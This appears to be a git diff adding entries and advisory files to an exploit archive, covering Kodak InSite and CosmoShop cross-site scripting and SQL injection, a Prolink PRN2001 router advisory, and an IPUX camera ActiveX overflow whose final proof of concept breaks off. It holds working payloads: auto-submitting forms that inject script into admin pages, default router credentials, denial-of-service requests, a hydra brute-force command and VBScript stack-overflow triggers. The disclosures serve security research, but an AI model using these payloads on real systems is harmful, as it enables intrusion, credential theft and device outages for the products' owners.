diff --git a/files.csv b/files.csv
index e25fee073..0d39b466b 100755
--- a/files.csv
+++ b/files.csv
@@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port
 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
-31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
+31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0
 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port
 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
-33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
+33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
@@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port
 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
-34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80
+34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80
 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
@@ -31736,7 +31736,7 @@ id,file,description,date,author,platform,type,port
 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
-35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0
+35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
 35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
 35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
@@ -31892,3 +31892,23 @@ id,file,description,date,author,platform,type,port
 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
+35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0
+35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0
+35413,platforms/php/webapps/35413.php,"WordPress <=4.0 Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80
+35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
+35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
+35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 'basicstats.php' Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
+35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0
+35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 'do' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0
+35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
+35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
+35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
+35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
+35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
+35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0
+35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0
+35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
diff --git a/platforms/asp/webapps/35411.txt b/platforms/asp/webapps/35411.txt
new file mode 100755
index 000000000..8b86b5bbc
--- /dev/null
+++ b/platforms/asp/webapps/35411.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46762/info
+
+Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kodak InSite 5.5.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Troubleshooting/DiagnosticReport.asp?HeaderWarning=<script>alert("XSS!")</script>&Language=en&rflp=true#
\ No newline at end of file
diff --git a/platforms/asp/webapps/35412.txt b/platforms/asp/webapps/35412.txt
new file mode 100755
index 000000000..676282913
--- /dev/null
+++ b/platforms/asp/webapps/35412.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46762/info
+ 
+Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+Kodak InSite 5.5.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Pages/login.aspx?SessionTimeout=False&Language=de%26rflp=True&#039;,&#039;00000000-0000-0000-0000-000000000000&#039;); alert(&#039;XSS!&#039;); return false; a(&#039;
\ No newline at end of file
diff --git a/platforms/cgi/webapps/35438.txt b/platforms/cgi/webapps/35438.txt
new file mode 100755
index 000000000..b33c20fd7
--- /dev/null
+++ b/platforms/cgi/webapps/35438.txt
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/46828/info
+
+CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CosmoShop ePRO V10.05.00 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cgi-bin/admin/index.cgi?action=menu&id=eco'+SQL_CODE&hId=eco
+
+<form action="http://www.example.com/cgi-bin/admin/edit_startseitentext.cgi" method="post" name="main" enctype="multipart/form-data">
+<input type="hidden" name="setup" value="allgemein">
+<input type="hidden" name="action" value="save">
+<input type="hidden" name="use_wwe" value="1">
+<input type="hidden" name="file-de" value="startseitentext_de.txt">
+<input type="hidden" name="text-de" value='page html"><script>alert(document.cookie)</script>'>
+</form>
+<script>
+document.main.submit();
+</script>
+
+http://www.example.com/cgi-bin/admin/rubrikadmin.cgi?action=edit&rubnum=angebote&rcopy="><script>alert(document.cookie)</script>&expand=,angebote
+
+http://www.example.com/cgi-bin/admin/artikeladmin.cgi?action=artikelsuche&typ=bearbeiten"><script>alert(document.cookie)</script>&hId=daten.artikel
+
+http://www.example.com/cgi-bin/admin/shophilfe_suche.cgi?sprache=de&suchbegriff=1"><script>alert(document.cookie)</script>
+
+
+<form action="http://www.example.com/cgi-bin/admin/setup_edit.cgi" method="post" name="main">
+
+<input type="hidden" name="setup" value="allgemein">
+<input type="hidden" name="hId" value="setup.einstellungen.allgemein">
+<input type="hidden" name="setup_key" value="allgemein">
+<input type="hidden" name="shoptitel" value="Cosmoshop Shopsoftware 10.x">
+<input type="hidden" name="shopbetreiber" value="email@example.com">
+<input type="hidden" name="shop_bestellempfaenger" value="email@example.com">
+<input type="hidden" name="anfrage_mail" value="email@example.com">
+<input type="hidden" name="shop_umstid" value="DE12345678">
+<input type="hidden" name="shop_eg" value="1">
+<input type="hidden" name="auftragszaehler" value="1">
+<input type="hidden" name="hauptwaehrung" value='EUR"><script>alert(document.cookie)</script>'>
+<input type="hidden" name="nebenwaehrung" value="$">
+<input type="hidden" name="eurofaktor" value="0.7">
+<input type="hidden" name="mindestpreisdm" value="10">
+<input type="hidden" name="emis_bestellempfaenger" value="">
+<input type="hidden" name="afs_bestellempfaenger" value="">
+<input type="hidden" name="ean_in_ausf" value="1">
+<input type="hidden" name="google_verify_code" value="">
+<input type="hidden" name="save_it" value="abspeichern">
+
+</form>
+<script>
+document.main.submit();
+</script>
\ No newline at end of file
diff --git a/platforms/hardware/webapps/35419.txt b/platforms/hardware/webapps/35419.txt
new file mode 100755
index 000000000..0ed66ac22
--- /dev/null
+++ b/platforms/hardware/webapps/35419.txt
@@ -0,0 +1,273 @@
+Exploit Title: Prolink PRN2001 Multiple Vulnerabilities
+
+1. -Advisory Information-
+
+Title: Prolink PRN2001 Multiple Vulnerabilities
+Firmware: Ver 1.2
+Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip
+Vendor Homepage: http://www.prolink2u.com/
+Author: Herman Groeneveld aka sh4d0wman
+Tested On: Windows 7 / Kali
+Date published: Dec 01 2014
+Release mode: Coordinated release
+
+2. -Vulnerability Information-
+
+PROLiNK® PRN2001 Wireless- N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater.
+
+Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are: admin/password
+
+In the default configuration all vulnerabilities are restricted to exploitation over the LAN/WLAN interfaces. A successful compromise would give an attacker full control over the device. This would enable an attacker to enable remote device management over the WAN interface. 
+
+
+3. - Technical Description / Proof of Concept Code -
+
+Introduction:
+
+The following type of vulnerabilities have been discovered in the device:
+- 3.1: CWE-286: Incorrect User Management
+- 3.2: CWE-668: Exposure of Resource to Wrong Sphere
+- 3.3: CWE-200: Information Exposure
+- 3.4: CWE- 80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
+- 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service
+- 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration
+
+
+Technical Description:
+--------------------------------------------------------------
+
+3.1 -Class: CWE-286: Incorrect User Management- 
+
+Description: insufficient separation of privileges. Any account with user-level privileges has the following privileges in the web-management interface:
+- Create new users with administrative privileges 
+- Upgrade the device firmware
+- Download and upload configuration files
+
+PoC: users could escalate their privileges by creating a new account.
+
+--------------------------------------------------------------
+
+3.2 -CWE-668: Exposure of Resource to Wrong Sphere-
+
+Description: a user-level account is not restricted from exporting or importing a device configuration file. The configuration file "config.img" is stored as plain-text XML. This is the root cause for the following vulnerabilities:
+
+---------------------------------------------------------------
+
+Name: privilege escalation through device configuration file
+
+Description: the plaintext XML configuration file leaks the administrative user and password of the device giving an attacker full control over the device. 
+
+PoC: administrative accounts have Flag value 0x0:
+<chain N="USERNAME_PASSWORD">
+<V N="FLAG" V="0x0"/>
+<V N="USERNAME" V="admin"/>
+<V N="PASSWORD" V="password"/>
+<V N="PRIORITY" V="0x2"/>
+</chain>
+
+---------------------------------------------------------------
+
+Name: telnet privilege escalation through device configuration file
+
+Description: in the plaintext XML configuration file any administrative user account is set to: <V N="PRIORITY" V="0x2"/>. When this value is changed to <V N="PRIORITY" V="0x1"/> the account gains the following additional command options in a telnet shell:
+
+- chksum: Check sum checking. Syntax: chksum address length
+- dhcp: Enable DHCP client
+- disable: Turn off privileged commands
+- enable: Turn on privileged commands
+- loaddll: Unknown functionality / DoS: issuing loaddll crashes the device
+- script: Run specified script
+- system: Show general system information
+- webdll: Unknown functionality
+- xfile: File copy functionality
+- xip: Resolve dns
+
+--------------------------------------------------------------
+
+3.3 -CWE-200: Information Exposure-
+
+Description: the device is leaking various kinds of sensitive information which can aid the attacker in vulnerability discovery and/or escalate privileges.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: configuration-file sensitive information disclosure
+
+Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plain-text. The following sensitive information is leaked:
+
+Confidentiality Related:
+- Plaintext administrative credentials 
+- Plaintext user-level credentials
+- Plaintext PPoE WAN credentials
+- Plaintext WEP key | WPA PSK | WSC Pin
+
+Device Integrity Related:
+- Create, Modify or Delete accounts:
+PoC: change anything inside the chain or delete the complete chain:
+<chain N="USERNAME_PASSWORD">
+<V N="FLAG" V="0x0"/>
+<V N="USERNAME" V="admin"/>
+<V N="PASSWORD" V="password"/>
+<V N="PRIORITY" V="0x2"/>
+</chain>
+
+- Enabling Device Management over WAN:
+PoC: modify NATRULE_INSRC_STATIC to allow web and or telnet device management over the WAN port.
+
+- DNS traffic redirection:
+PoC: modify DHCP Assigned DNS settings to point clients to a rogue DNS server.
+
+--------------------------------------------------------------
+
+Name: log-file sensitive information disclosure
+
+Description: logging is disabled by default. When it is enabled any valid user-level or administrative accounts can view this log through the web-management interface. Invalid logon attempts show the username and invalid passwords in plaintext. If a user does misspell his password an attacker has a high chance of guessing the correct password.
+
+Data Exposed:
+- Usernames
+- Passwords (partial)
+
+--------------------------------------------------------------
+
+Name: telnet sensitive information disclosure
+
+Description: the telnet command "show web" lists the complete web structure which can aid an attacker in vulnerability discovery. 
+
+PoC: the following URL's are leaked and not available through the default web-management interface:
+- dhcpvendortbl_withoutcheck.htm
+- debug.htm
+
+--------------------------------------------------------------
+
+
+3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)-
+
+Description: the web-based device management interface is vulnerable to persistent XSS attacks caused by insufficient input validation. A valid account on the router is needed to exploit the vulnerabilities. 
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+URL: ddns.htm
+Field(s): hostname, username
+PoC: insert into both fields: <script>alert(String.fromCharCode(88,83,83));</script>
+
+XSS Execution: 
+- When the dyndns settings page is requested in the web-interface
+- if logging is enabled: loading the system log in the web-interface
+
+--------------------------------------------------------------
+
+URL: login.htm
+Fields: username
+PoC: insert as username: <script>alert(String.fromCharCode(88,83,83));</script>
+
+XSS Execution:
+- if logging is enabled: loading the system log in the web-interface
+
+-------------------------------------------------------------- 
+
+URL: config.img
+Field(s): any of the above values but modified through the configuration file (XML).
+
+Description: the configuration file is stored in plain-text. Above injection can be carried out by inserting the XSS test-string into XML elements. Execution takes place inside the web-management interface when browsed to the vulnerable url's.
+
+XSS Execution:
+- same locations as previous disclosed injections but in XML, username injection example:
+
+<V N="USERNAME" V="[XSS Inject Here]"/>
+<V N="PASSWORD" V="test"/>
+
+--------------------------------------------------------------
+
+
+3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service-
+
+Description: un-authenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In this process all LAN, WAN and Wireless connections are dropped.
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: Unauthenticated device DoS
+
+Description: sending a request to [device ip]/autboot.htm in the web-management interface will initiate a factory-default reboot. In this process all LAN, WAN and Wireless connections are dropped. Device settings however remain unchanged.
+
+PoC: GET request to [deviceip]/autoboot.htm
+
+--------------------------------------------------------------
+
+Name: Authenticated device DoS through invalid firmware update
+
+Description: authenticated users could crash the device by uploading a large file as firmware upgrade. The device has no checks in place before the upload is accepted. After a certain amount of data is uploaded the device will initiate a reboot, most likely to resource exhaustion of either the memory or local disk space.
+
+PoC: upload any big file as firmware image
+
+--------------------------------------------------------------
+
+Name: Authenticated Telnet custom command device DoS
+
+Description: various custom telnet commands can be unlocked through the configuration file. Executing the "loaddll" command without any parameters will crash and reboot the device.
+
+PoC: gain special privileges and issue the loaddll inside the telnet shell
+
+--------------------------------------------------------------
+
+Name: Authenticated NTP Date HTTP Request device DoS
+
+Description: the web-management interface allows time configuration by authenticated users. If certain parts are modified the device will crash and reboot.
+
+PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send
+Insert junk (for example: A*400) in Year, Month or Day and the device will crash.
+
+--------------------------------------------------------------
+
+
+3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration-
+
+Description: various configuration settings do not conform to general recommended security best practices weakening the device's security posture. 
+
+Vulnerable Functions:
+
+--------------------------------------------------------------
+
+Name: configuration error 
+
+Description: when new user accounts are created through the web-management interface the default permissions are root-level and these can't be changed to user-level. However intercepting the HTTP request and modifying the permissions parameter to user-level results in the creation of a user account with user-level privileges. Parts of the web management interface will be restricted.
+
+PoC: enter a valid name and password, change the privilege level to 1 (root priv) or 2 (user priv):
+username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=$submit.htm%Fuserconfig.htm=Send
+
+--------------------------------------------------------------
+
+Name: unencrypted device management protocols
+
+Description: the router can be managed either through the web-management interface which sends HTTP traffic or by Telnet. Both protocols use plaintext communications which could allow an attacker to intercept and/or modify this traffic.
+
+--------------------------------------------------------------
+
+Name: password complexity and lockout policy
+
+Description: no password complexity is enforced, the minimum length is 1 character. No lockout mechanism does exist for the web-management interface. This enables an attacker to guess a correct username / password combination through password guessing or brute-forcing. Weak passwords give an attacker a higher chance of success.
+The telnet service features a lockout policy; it disconnects any client after three wrong login attempts.
+
+PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error'
+
+--------------------------------------------------------------
+
+4. -Vendor Information, Solutions and Workarounds-
+Date 10-10-2014 - Vulnerabilities discovered
+Date 20-10-2014 - Contacted vendor by e-mail for responsble disclosure, informed them of release date December 1st 2014
+		  No Reply
+Date 01-11-2014 - Contacted vendor by e-mail
+		  No Reply
+Date 15-11-2014 - Contacted vendor by e-mail
+		  No Reply
+Date 01-12-2014 - Public Disclosure
+
+5. -Author-
+This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman
+I am a freelance security consultant / researcher based in Phnom Penh
+Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-)
+herman_worldwide [at] hotmail [.co]m
\ No newline at end of file
diff --git a/platforms/hardware/webapps/35420.txt b/platforms/hardware/webapps/35420.txt
new file mode 100755
index 000000000..edd0fc7cb
--- /dev/null
+++ b/platforms/hardware/webapps/35420.txt
@@ -0,0 +1,273 @@
+?
+IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
+
+Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
+Motion JPEG video compression, the file size of video stream is extremely reduced,
+as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
+a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
+illuminators for both day and night applications.
+
+Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraMJCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(48d0.2e98): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx - 
+eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
+eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+ntdll!RtlDeleteCriticalSection+0x77:
+7796466c 833800          cmp     dword ptr [eax],0    ds:002b:41414149=????????
+
+----------------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5214
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription		UltraMJCam ActiveX Control
+FileVersion		1, 0, 52, 23
+InternalName		UltraMJCamX
+OriginalFileName	UltraMJCamX.ocx
+ProductName		UltraMJCam device ActiveX Control
+ProductVersion		1, 0, 52, 23
+
+
+List of members:
+----------------
+
+Interface IUltraMJCamX : IDispatch
+Default Interface: True
+Members : 65
+	RemoteHost
+	RemotePort
+	AccountCode
+	GetConfigValue
+	SetConfigValue
+	SetCGIAPNAME
+	Password
+	UserName
+	fChgImageSize
+	ImgWidth
+	ImgHeight
+	SnapFileName
+	AVIRecStart
+	SetImgScale
+	OpenFolder
+	OpenFileDlg
+	TriggerStatus
+	AVIRecStatus
+	Event_Frame
+	PlayVideo
+	SetAutoScale
+	Event_Signal
+	WavPlay
+	CGI_ParamGet
+	CGI_ParamSet
+	MulticastEnable
+	MulticastStatus
+	SetPTUserAllow
+	SetLanguage
+	TimestampEnable
+	TimestampStroke
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SetCGIAPNAME
+Password
+Username
+SnapFileName
+OpenFolder
+CGI_ParamGet
+CGI_ParamSet
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let RemoteHost As String"
+memberName = "RemoteHost"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.RemoteHost = arg1
+</script>
+</html>
+
+
+---2
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let AccountCode As String"
+memberName = "AccountCode"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(3092, "A")
+target.AccountCode = arg1
+</script>
+</html>
+
+
+---3
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let SetCGIAPNAME As String"
+memberName = "SetCGIAPNAME"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(3092, "A")
+target.SetCGIAPNAME = arg1
+</script>
+</html>
+
+
+---4
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let Password As String"
+memberName = "Password"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(2068, "A")
+target.Password = arg1
+</script>
+</html>
+
+
+---5
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let UserName As String"
+memberName = "UserName"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(4116, "A")
+target.UserName = arg1
+</script>
+</html>
+
+
+---6
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Property Let SnapFileName As String"
+memberName = "SnapFileName"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(4116, "A")
+target.SnapFileName = arg1
+</script>
+</html>
+
+
+---7
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
+memberName = "OpenFolder"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 1
+arg1=String(5140, "A")
+target.OpenFolder arg1 
+</script>
+</html>
+
+
+---8
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
